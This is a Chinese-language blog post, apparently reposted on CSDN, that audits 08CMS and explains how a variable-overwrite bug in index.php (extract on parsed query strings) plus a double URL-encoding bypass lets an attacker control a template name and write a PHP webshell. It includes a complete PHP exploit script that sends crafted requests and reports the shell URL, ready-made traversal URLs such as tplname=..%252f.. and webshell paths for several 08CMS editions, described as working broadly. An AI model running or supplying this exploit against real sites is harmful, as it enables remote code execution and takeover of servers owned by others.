08cms cecore.cls.php,08CMS 变量覆盖导致getshell 等问题

最新推荐文章于 2024-07-10 02:25:41 发布
最新推荐文章于 2024-07-10 02:25:41 发布
阅读量116 收藏
点赞数
文章标签: 08cms cecore.cls.php

我也是初学php 文章有什么不对的 还望各位指出错误 见谅 。。。

=================================================================

/Include/general.inc.php 21-26行

[php]

(isset($_REQUEST['GLOBALS']) || isset($_FILES['GLOBALS'])) && exit('08cms Error');

if(!QUOTES_GPC && $_FILES) $_FILES = maddslashes($_FILES);

foreach(array('_GET','_POST') as $_request){

foreach($$_request as $k => $v){

$k{0} != '_' && $$k = maddslashes($v);

}

}

[/php]

这样写虽然很方便但是变量没初始化的时候我们就可以提交了

我们看看 Index.php 文件

[php]include_once dirname(__FILE__).'/include/general.inc.php';

include_once M_ROOT.'./include/common.fun.php';

if_siteclosed();

mobile_open() || message('手机版尚未开放');

parse_str(un_virtual($_SERVER['QUERY_STRING']),$temparr);

/*[/php]

我们看看这句代码

$_SERVER['QUERY_STRING']就是获取查询字符串的。。比如说xx.php?id=222 他就获取了id=222

un_virtual这个函数是过滤获取查询字符串的我们看看是咋写的

[php]function un_virtual($str){

......

$str = str_replace(array('/','-'),array('&','='),$str); 把 / 和 - 替换成 & 和 =

......

return $str;

}

[/php]

parse_str()这个是把查询字符串解析到变量中 用于存储的变量是$temparr这个

我们接着看下面的吧

[php]

$_da = array();

if(!$cnstr){

$tplname = $_ismobile ? $o_index_tpl : $hometpl ; //$tplname这个在这里定义的了

$_da['rss'] = $cms_abs.'rss.php';

$_da += $temparr; // $_da= $_da+$temparr

unset($temparr);//销毁变量

extract($_da,EXTR_OVERWRITE); //变量覆盖 这样我们可以控制了$tplname这个变量

tpl_refresh($tplname); //这个tpl_refresh函数就是我们要利用的地方 看看咋写的

*/

[/php]

\include\refresh.fun.php 2行

[php]function tpl_refresh($tplname){

global $templatedir,$debugtag;

$tdir = M_ROOT."template/$templatedir/";

$cacf = $tdir.'pcache/'.$tplname.'.php'; // 我们是可以控制这些变量的

if(file_exists($x = $tdir."function/utags.fun.php")) include_once $x;//利用在下面当然这里也能利用 截断下

mmkdir($cacf,0,1);

if($debugtag || !file_exists($cacf)){ //轻松进入流程

$str = load_tpl($tplname); //看这个函数的名字应该是打开文件 返回内容

/* load_tp: include\refresh.fun.php 1137行

$tpl = @file2str(M_ROOT."template/$templatedir/".$tplname); //file2str这个是打开文件的函数 我就不贴上来了

$rt && $tpl = preg_replace("/\{tpl\\$(.+?)\}/ies", "rtagval('\\1','$rt')",$tpl); 过滤无压力* /

$str = preg_replace("/', $str); //依旧无压力

$str = preg_replace("/\/s", "{\\1}", $str);

breplace($str,'');

nreplace($str);

quit_refresh_var();

$str = tpl_basecode($str);

//以上代码都是过滤

str2file($str,$cacf);//这个是写文件 函数就不贴了

}

unset($str,$tdir,$cacf);

}

[php]

有了这些我们就可以 写文件了 不过还有些限制

[php]$cacf = $tdir.'pcache/'.$tplname.'.php';

$str = load_tpl($tplname);

$tpl = @file2str(M_ROOT."template/$templatedir/".$tplname);

[/php]

$tplname都是我们控制的 我们可以上传个图片来生成文件 还可以找找有木有其他生成的地方

\tools\ptool.php

[php]$cf = M_ROOT.'./dynamic/stats/aclicks.cac';

$ct = M_ROOT.'./dynamic/stats/aclicks_time.cac';

/* 省略 */

if(@$fp = fopen($cf,'a')){

fwrite($fp,"$aid\n");

fclose($fp);[/php]

aid没有是初始化我们可以提交

8 aid没有是初始化我们可以提交

好了 现在可以提交了 写文件了 但是还有个限制就是不能跳出目录 因为一开始有过滤的(开头的代码)

parse_str(un_virtual($_SERVER['QUERY_STRING']),$temparr);

不过由于parse_str 这个函数 会自动url解码 所以我们加一次url编码就可以绕过un_virtual的过滤了~

这个cms还是有很多问题的。。

利用写了个exp 新手可能有错误 大家见谅:

[php]

if ($argc < 2 ) {

print_r('

+---------------------------------------------------------------------------+

)_|

_/ |_ _ _

______/□□ \_∩- // //

\ 20 \_________\_//>_//>_

\________________________|

[+] php '.$argv[0].' [url]www.08sec.com[/url]

+---------------------------------------------------------------------------+

');

exit;

}

error_reporting(E_ERROR);

set_time_limit(0);

$host = $argv[1];

go($host);

function go ($host)

{

global $exp,$exp1;

$re = Send ($host,$exp);

stripos($re,"MySQL")>0

?

Send ($host,$exp)

:

"";

$re = Send ($host,$exp1) and stripos($re,"aclicks.cac")>0

?

exit(" + Exploit Success!\r\n + http://$host/template/dynamic/stats/aclicks.cac.php\r\n")

:

exit(" - Exploit Failed!\n");

}

function Send($host,$url)

{

$data = "GET $url HTTP/1.1\r\n";

$data .= "Host: $host\r\n";

$data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.03 [en]\r\n";

$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";

$data .= "Content-Type: application/x-www-form-urlencoded\r\n";

$data .= "Accept-Language: en-us\r\n";

$data .= "Connection: Close\r\n\r\n";

$fp = @fsockopen($host, 80);

if (!$fp) {

die("[-] Connect to host Error\r\n");

}

fwrite($fp, $data);

$back = '';

while (!feof($fp)) {

$back .= fread($fp, 1024);

}

fclose($fp);

return $back;

}

?>[/php]

应该是通杀的吧

有的版本需要转2此url码

因为有的开始就解码了

汽车CMS4.1 GBK版 :

exp index.php?tplname=..%252f..%252fdynamic%252fstats%252faclicks.cac

shell /dynamic/tplcache/common/….dynamicstatsaclicks.cac.php

装修 CMS :

shell: /dynamic/dynamic/stats/aclicks.cac.php

附上个HTML上传的代码

[php]

[/php]

(因为08cms版本很多 文章版本是 汽车4.3 UTF-8版的)

=======================================

来源:90‘s blog 作者:honker90

天尊玫瑰
关注
2023年国家护网0day-poc/exp漏洞全汇总(目前已更新到91个..实时更新中...)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
08-21 3359
2023年国家护网目前收集到的0day和1day漏洞的poc或者exp大汇总,截止目前已更新到91个漏洞,本文会实时更新,有新的漏洞都会加上
08cms后台SHELL教程
09-29
拿后天,代码,教程拿后天,代码,教程拿后天,代码,教程
php 删除%3ca%3e标签,08cms会员中心xss+csrf可getshell
weixin_35720035的博客
03-21 582
这个属于本站原创,很难看到的哦首先是在搜索出存在反射性的跨站搜索处存在反射性xss[php]http://0day5.com/search.php?caid=2&ccid1=208&chid=4&djfrom=1&djto=1http://0day5.com/search.php?caid=2&ccid1=208&chid=4&djfrom=...
08CMS小说搜索型注入 - 漏洞发布 京华志
浓缩精华 方成志 京华志
10-04 1078
Vul Code: //搜索词预处理 $searchword = empty($searchword) ? '' : cutstr(trim($searchword),50,''); $_da['searchword'] = $searchword; if($search
cecore.cls.php 08cms,精仿某房产网整站 v1.1
weixin_29795345的博客
03-20 128
(!defined('M_COM') || !defined('M_ADMIN')) && exit('No Permission');aheader();backallow('other') || amessage('您没有当前项目的管理权限。');load_cache('vcatalogs');if($action == 'voteadd'){backnav('vote','a...
08cms_5房产源码破解版_需要安装zend等
01-01
淘宝购买的08cms_5房产源码破解版_需要安装zend等,最好在linux 服务器 或者 win2003 下测试,或直接上传服务器install/index.php 权限 777,切记,安装需求较多,请细心.
tpl.cls.php,某开源企业站CMS审计报告
weixin_32043233的博客
03-27 175
前言最近渗透测试某站点的时候触发了一个报错,然后发现了站点使用的CMS,百度了一下是一个国产开源的企业级CMS。从官网拉下来审了一下,再此记录一下入口下面是index.php入口文件if( !file_exists(dirname(__FILE__) . "/include/config.db.php") ){header("Location:install/index.php");exit();...
玄机——第五章 linux实战-CMS01 wp
最新发布
焦虑的焦虑
07-10 4925
第五章 linux实战-CMS01
Emlog漏洞————Emlog相册插件前台SQL注入+Getshell
Fly_鹏程万里
06-05 2672
Emlog简介 Emlog是“Every Memory Log”的简介,意即:点滴记忆。它是一款基于PHP语言哈MYSQL数据库的开源、免费、功能强大的个人或多人联合撰写的博客系统(Blog)。基于PHP和MYSQL的功能强大的博客以及CMS建站系统。致力于提供快速、稳定,且在使用上又及其简单、舒适的博客服务。安装和使用都非常方便。目前Emlog正在受到越来越多的广大用户的青睐。 此次引起漏洞...
密码安全攻防技术精讲
GitChat
07-03 3103
课程介绍 本课程内容将以作者亲身经历的事情为主,从技术的视野和攻防角度来剖析各种密码及其他技术对工作和个人生活的影响,将“高高在上”的技术拉进我们日常的生活中来。每一篇文章都是精挑细选的典型案例,背后都有真实故事和场景,以技术的方式来再现和还原。 非技术专业读者可以通过这些文章来了解和预防各种涉及密码的攻击,从事技术工作的读者可以按照文章的搭建环境进行实战实践。由于篇幅有限,密码攻防涉及的技术非常...
几乎所有编程语言的hello, world程序(1)
nomasp
04-29 9304
简介“hello, world”程序是指在电脑屏幕上打印/输出”hello, world”这行字符串的应用程序。该范例最早出自1972年由贝尔实验室成员布莱恩柯林汉撰写的内部技术档案”A Tutorial Introduction to the Language B”中,不久同作者于1974年所写的”Programming in C: A Tutorial”也使用了这个范例,而以本文档所改写的《C语
文件上传漏洞
m0_61506558的博客
08-06 683
1.1PHP代码文件上传。
笔记,后期整理
weixin_30278237的博客
08-06 8332
VM 虚拟各种系统的工具 安装目录 不要放在C盘 需要下载的镜像Windows NT win7 xp server08R2 server12类Nnix centos 6/7/8 ubuntu 14/16/18 kali安装 win7 1g=1024M1M=1024KB1KB=1024bit1bit 是一个字节 一个字节就是8位由0或者1组成(二进制) 10 进制0-9组成的数字...
动态分析小示例| 08CMS SQL 注入分析
dfdhxb995397的博客
04-10 141
i春秋作家:yanzm 0×00 背景 本周,拿到一个源码素材是08cms的,这个源码在官网中没有开源下载,需要进行购买,由某师傅提供的,审计的时候发现这个CMS数据传递比较复杂,使用静态分析的方式不好操作,刚好这周小三上位(换了新电脑),就直接安装下phpstorm+xdebug+xdebug-ext(火狐)进行动态分析,本篇主要是以SQL注入漏洞为例子,进行动态分析的演练,当然源...
[渗透测试篇一]:基础
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
04-16 797
目录 常见的术语 渗透测试流程: 学习环境的配置 HTTP协议 网站搭建配置 常见的术语 1、脚本(asp,php,jsp)前台不可见 2、html(css,js,html) 解释语言,前台可见(右键-检查,F12) 3、HTTP协议 4、CMS(B/S)内容管理系统, 内容管理系统(content management system,CMS)是一种位于WEB ...
cecore.cls.php 08cms,动态分析小示例| 08CMS SQL 注入分析
weixin_32802111的博客
03-20 209
0×00 背景本周,拿到一个源码素材是08cms的,这个源码在官网中没有开源下载,需要进行购买,由某师傅提供的,审计的时候发现这个CMS数据传递比较复杂,使用静态分析的方式不好操作,刚好这周小三上位(换了新电脑),就直接安装下phpstorm+xdebug+xdebug-ext(火狐)进行动态分析,本篇主要是以SQL注入漏洞为例子,进行动态分析的演练,当然源码还有其他漏洞待挖掘,期待师傅们一起交流...
08CMS安装全步骤指南
"08CMS安装教程详解,包括下载、解压、上传、设置目录属性以及执行安装脚本等步骤,适用于本地Windows环境,需要PHP5、MYSQL5和APACHE2.2支持。" 08CMS是一款内容管理系统,用于搭建网站。本教程详细介绍了08CMS的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值